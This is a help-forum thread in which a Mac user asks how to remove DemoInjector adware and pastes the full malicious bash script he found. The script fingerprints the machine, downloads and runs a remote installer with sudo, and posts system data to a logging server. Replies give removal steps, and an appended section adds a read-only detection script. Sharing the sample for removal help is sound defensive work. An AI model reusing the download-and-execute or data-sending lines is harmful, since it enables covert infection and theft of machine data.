
Removing DemoInjector (Mac.Trojan.VSearch)

Hi,


I see the script below in the root path (named /file) and assume I have accidentally installed the DemoInjector (Mac.Trojan.VSearch).


--------------------------------------------------------------------------------

#!/bin/bash

# ioreg -l | grep -e Manufacturer -e 'Vendor Name'

updFile="/var/tmp/updText.txt"

updFileError="/var/tmp/updTextError.txt"

chmod 777 $updFile;

chmod 777 $updFileError;

echo > $updFile

echo > $updFileError

br_mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

midFile=$(find /System/Library/Frameworks -type f -name "*.uuid.plist" -print0 | xargs -0 ls -tl | sort -n | tail -1 | awk '{print $9}')

if [ -e "$midFile" ]; then

mid=$(echo "$midFile" | python -c 'import sys;print open(sys.stdin.read().rstrip(), "r").read().split("<string>")[1].split("</string>")[0]')

echo "mid: $mid." >> $updFile

fi

get_pd_client_data="http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=$br_mid&ct=pd"

data=$(curl -s "$get_pd_client_data")

dc=""

channel=$(echo $dc | tr -d '[[:space:]]' | tr -cd 0-9)

pdChannel=${dc:2}

echo "DC: $dc" >> $updFile

click_id="0"

echo "CLICK_ID: $click_id" >> $updFile

click_stamp=""

echo "CLICK_STAMP: $click_stamp" >> $updFile

id=$dc"--"$click_id"___"$click_stamp"___"$br_mid

echo "Full ID: $id" >> $updFile

domain=""http://aa81bf391151884adfa3dd677e41f94be1.com""

pop_url="'http://aa81bf391151884adfa3dd677e41f94be1.com/pp/fd?re=1&uid=[MACHINE_ID]&u=[CONTEXT_URL]'"

pop_delay="1"



if [ $midFile ]; then

frm=$(echo $midFile | tail -1 | awk -F "/" '{print $5}' | awk -F "." '{print $1}')

fi

mid_proc=false

if [ $frm ];then

if ps -ef | grep -v grep | grep -q $frm; then

mid_proc=true

fi

fi

echo "midFile: $midFile." >> $updFile

echo "frm: $frm" >> $updFile

echo "mid_proc: $mid_proc" >> $updFile



pInj () {

tmpfile="/var/tmp/dit7.tgz"

filePath="/var/tmp/DemoInjector10042016"


/usr/bin/curl -s -L -o $tmpfile "http://pullmenow.com/pd_files/dit7.tgz" #Vipul - this is from where it download

sleep 10

tar -xzf $tmpfile -C /var/tmp/

sleep 5

sudo chmod 777 $filePath/install_Injector.sh

echo sudo $filePath/install_Injector.sh A$pdChannel $click_id $domain >> $updFile

sudo $filePath/install_Injector.sh A$pdChannel $click_id $domain

sleep 30

rm -rf $tmpfile

rm -rf $filePath

}

shouldPDInj="1"

echo $shouldPDInj

if [[ $mid_proc = false && "$shouldPDInj" == "1" ]]; then

echo "vs_inj_no_mid" >> $updFile

echo "Installing pInj with logger" >> $updFile

pInj &> $updFileError;

sleep 10

echo $(</var/tmp/updTextError.txt) >> $updFile

else

echo "vs_inj_mid: $mid" >> $updFile

fi



eventType="Update Script Output"

sleep 30

curl --request POST 'http://93a555685cc7443a8e1034efa1f18924.com/v/pd-logger' --data "vs_mid=$mid" --data "br_mid=$br_mid" --data-urlencode "event_type=$eventType" --data-urlencode "event_data=$(<$updFile)"

sleep 5

rm -rf $updFile

rm -rf /var/tmp/updText2.txt

rm -rf $updFileError

--------------------------------------------------------------------------------


I also see the two entries below in /etc/passwd:


_clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false

_amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false

I have renamed /file to /file.txt and rebooted.

I am familiar with unix but new to Mac.

I need advice on how to remove it.

Thanks,

-Vipul.

MacBook Pro (Retina, 15-inch, Mid 2015), OS X El Capitan (10.11.4)

Posted on May 16, 2016 10:21 PM

6 replies

May 17, 2016 4:50 AM in response to vipulkuruppu

This is an adware injecting Trojan.


For info about this:

Demonjector VSearch.7

http://vms.drweb-av.es/virus/?_is=2&i=7986808



1. Remove the adware manually by following the “HowTo” from Apple.

http://support.apple.com/en-us/HT203987



2. Disable/Uninstall Extensions and test.


Safari > Preferences > Extensions

Select and disable all extensions and test.

Enable Extensions one by one and test.

To uninstall any extension, select it and click the “Uninstall” button.


3. Safari > Preferences > Search > Search Engine:

Select your preferred search engine.


4. Safari > Preferences > General > Homepage:

Set your Homepage.


Note: Using https://www.malwarebytes.org/antimalware/mac/ is easy.

Thomas Reed, the author of Malwarebytes-antimalware for Mac is "one of us" here and highly regarded.

You have indicated that you changed the name of it. I don't know what impact it will have on the removal process.



Best.

May 17, 2016 11:12 AM in response to vipulkuruppu

You may have installed ad-injection malware ("adware").

Don't use any kind of "anti-virus" or "anti-malware" product on a Mac. There is never a need for it, and relying on it for protection makes you more vulnerable to attack, not less.

Back up all data first.

If you're not already running the latest version of OS X, updating or upgrading in the App Store may cause the adware to be removed automatically. If you are already running the latest version, please log out or restart the computer. Again, some kinds of malware will be removed—not all. There is no such thing as automatic removal of all possible malware, either by OS X or by third-party software. That's why you can't rely on software to protect you.

If the malware is removed in your case, you'll still need to make changes to the way you use the computer to protect yourself from further attacks. Ask if you need guidance.

If the malware is not removed automatically, see below.

This easy procedure will detect any kind of adware that I know of. Deactivating it is a separate, and even easier, procedure.

Some legitimate software is ad-supported and may display ads in its own windows or in a web browser while it's running. That's not malware and it may not show up. Also, some websites carry intrusive popup ads that may be mistaken for adware.

If none of your web browsers is working well enough to carry out these instructions, restart the computer in safe mode. The malware will be disabled temporarily.

Step 1

Please triple-click the line below on this page to select it, then copy the text to the Clipboard by pressing the key combination command-C:

~/Library/LaunchAgents

In the Finder, select

Go > Go to Folder...

from the menu bar and paste into the box that opens by pressing command-V. Press return. Either a folder named "LaunchAgents" will open, or you'll get a notice that the folder can't be found. If the folder isn't found, go to the next step.

If the folder does open, press the key combination command-2 to select list view, if it's not already selected. Please don't skip this step.

There should be a column in the Finder window headed Date Modified. Click that heading twice to sort the contents by date with the newest at the top. If necessary, enlarge the window so that all of the contents are showing.

Follow the instructions in this support article under the heading "Take a screenshot of a window." An image file with a name beginning in "Screen Shot" should be saved to the Desktop. Open the screenshot and make sure it's readable. If not, capture a smaller part of the screen showing only what needs to be shown.

Start a reply to this message. Drag the image file into the editing window to upload it. You can also include text in the reply.

Leave the folder open for now.

Step 2

Do as in Step 1 with this line:

/Library/LaunchAgents

The folder that may open will have the same name, but is not the same, as the one in Step 1. As in that step, the folder may not exist.

Step 3

Repeat with this line:

/Library/LaunchDaemons

This time the folder will be named "LaunchDaemons."

Step 4

Open the Safari preferences window and select the Extensions tab. If any extensions are listed, post a screenshot. If there are no extensions, or if you can't launch Safari, skip this step.

Step 5

If you use the Firefox or Chrome browser, open its extension list and do as in Step 4.
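As an added example (not code from the thread or from Apple), here is a read-only triage script that covers both the posted script in the question and Steps 1 to 3 of the reply above: it lists the launchd plists in the three Library folders newest first, and reports whether the files the posted script drops under /var/tmp are present. The function names are my own; the artefact paths are the ones that appear in the posted script.

```shell
#!/bin/sh
# Added example, not from the thread: a read-only triage script for the
# two checks discussed above. check_artifacts looks for the files the
# posted script writes under /var/tmp and the renamed /file.txt;
# list_launch_items prints launchd plists newest first, which is what the
# second reply has the user do by hand for the three Library folders.

# Paths taken from the posted script. The _clamav and _amavisd lines quoted
# from /etc/passwd are stock OS X accounts, so they are not treated as a
# sign of infection here.
ARTIFACTS="/file /file.txt /var/tmp/updText.txt /var/tmp/updTextError.txt
/var/tmp/dit7.tgz /var/tmp/DemoInjector10042016"

# check_artifacts [root]: print each artefact that exists under root.
# root is "" (the real filesystem) unless a scratch directory is given.
check_artifacts() {
    root="${1:-}"
    for p in $ARTIFACTS; do
        [ -e "$root$p" ] && echo "present: $root$p"
    done
    return 0
}

# count_artifacts [root]: number of artefacts present, for scripting/tests.
count_artifacts() { check_artifacts "$1" | wc -l | tr -d ' '; }

# list_launch_items dir: one line per plist in dir, newest first, showing
# modification time, launchd Label and path. A missing dir is reported, not
# an error, matching the reply's "folder can't be found" case.
list_launch_items() {
    dir="$1"
    [ -d "$dir" ] || { echo "$dir: not present"; return 0; }
    ls -t "$dir"/*.plist 2>/dev/null | while read -r f; do
        label=$(awk '/<key>Label<\/key>/ { getline;
            gsub(/.*<string>|<\/string>.*/, ""); print; exit }' "$f")
        printf '%s  %s  %s\n' "$(date -r "$f" '+%Y-%m-%d %H:%M')" \
            "${label:-?}" "$f"
    done
}

# Invoked directly: review the three folders from the reply, then the
# artefact paths. Nothing is removed; decide per item after reading it.
for d in "$HOME/Library/LaunchAgents" /Library/LaunchAgents \
         /Library/LaunchDaemons; do
    echo "== $d"
    list_launch_items "$d"
done
check_artifacts
```

Items at the top of each listing with a Label you do not recognise are the ones to read and, if unwanted, unload and delete by hand.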
